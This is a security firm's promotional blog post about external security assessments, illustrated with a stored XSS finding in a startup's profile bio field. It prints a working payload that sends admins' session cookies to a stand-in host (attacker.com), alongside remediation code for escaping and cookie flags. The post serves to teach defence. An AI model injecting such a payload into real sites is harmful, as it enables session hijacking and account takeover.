Getting a Security Assessment: What to Expect and Why It Matters
During a recent assessment for a startup in Coeur d'Alene, we found five exploitable vulnerabilities in under 45 minutes - including a stored Cross-Site Scripting flaw that would have allowed an attacker to silently hijack any admin session on the platform.
The startup's CTO had built the application himself. He was skilled, thorough, and genuinely careful. He just wasn't looking at it from an adversary's perspective. That's the entire point of an external assessment.
What We Test
- External attack surface - what's exposed to the internet, open ports, software versions, subdomain enumeration
- Web application vulnerabilities - OWASP Top 10 and beyond
- SSL/TLS configuration - protocol support, cipher strength, certificate validity
- Security headers - HTTP headers that prevent clickjacking, content injection, and MIME sniffing
- DNS configuration - SPF, DKIM and DMARC email-spoofing protections, zone transfer exposure
- Sensitive path exposure - admin panels, backup files, config files accessible without authentication
A Real Finding: Stored XSS (OWASP A03 - Injection)
On the Coeur d'Alene startup engagement, a user profile bio field was rendering unsanitized HTML. We injected a payload that silently exfiltrated session cookies from any admin who viewed the profile:
<!-- Payload injected into "bio" field in user profile -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+btoa(document.cookie))">
<!-- When an admin views the profile page, their session cookie
is silently sent to the attacker's server. No interaction required. -->

// Vulnerable code (React/JS):
element.innerHTML = userData.bio; // Never do this with untrusted input

// Safe alternatives:
element.textContent = userData.bio; // Plain text, no HTML rendered

// Or if HTML is required, sanitize first:
import DOMPurify from 'dompurify';
element.innerHTML = DOMPurify.sanitize(userData.bio);
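The two defences a report like this would recommend, shown as an added example rather than Blackhount's or the startup's own code: server-side escaping of the bio field so the stored payload renders as text, and a check that the session cookie carries the HttpOnly, Secure and SameSite flags that would have kept document.cookie out of reach. The bio string is the payload from the finding; the cookie headers are constructed samples.

```javascript
// Added example, not Blackhount's code: two server-side defences for the
// stored-XSS finding above. Plain Node.js, no packages required.

// Constructed sample: the "bio" payload from the finding, as stored in the DB.
const SAMPLE_BIO =
  '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+btoa(document.cookie))">';

// Escape the five characters that let text break out of an HTML text node or
// quoted attribute. The result renders as literal text, never as markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Server-side render of the profile card. Every untrusted field passes through
// escapeHtml before it is concatenated into the template, so the stored payload
// is shown as text and the onerror handler never becomes an attribute.
function renderProfile(user) {
  return `<div class="profile"><h2>${escapeHtml(user.name)}</h2>` +
         `<p class="bio">${escapeHtml(user.bio)}</p></div>`;
}

// Defence in depth: the payload above only works because document.cookie can
// read the session cookie. Given one Set-Cookie header value, return the names
// of the protections it is missing (an empty array means all three are present).
function missingCookieFlags(setCookie) {
  const attrs = setCookie.split(';').slice(1).map((a) => a.trim().toLowerCase());
  const missing = [];
  if (!attrs.includes('httponly')) missing.push('HttpOnly'); // blocks document.cookie
  if (!attrs.includes('secure')) missing.push('Secure');     // never sent over plain HTTP
  const sameSite = attrs.find((a) => a.startsWith('samesite='));
  if (!sameSite || sameSite === 'samesite=none') missing.push('SameSite');
  return missing;
}

// Stand-alone demo: render the malicious bio and audit two constructed cookie headers.
console.log(renderProfile({ name: 'Mallory', bio: SAMPLE_BIO }));
console.log(missingCookieFlags('session=abc123; Path=/'));
console.log(missingCookieFlags('session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax'));
```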
What the Report Looks Like
Every finding in a Blackhount report includes:
- The exact URL or system affected
- Severity rating (Critical / High / Medium / Low) with justification
- Evidence - a screenshot, HTTP request/response, or code snippet proving the issue is real and exploitable
- Concrete remediation steps written in plain language - no security degree required
How Often?
At minimum annually - and after any major launch, infrastructure change, or significant team growth. For businesses handling payment or health data, more frequently. Start with a free assessment - two minutes, no commitment, honest results.
Have questions about your security posture?
Blackhount offers free security assessments for Idaho businesses. No commitment, no jargon - just honest answers about what we find.
Get a Free Assessment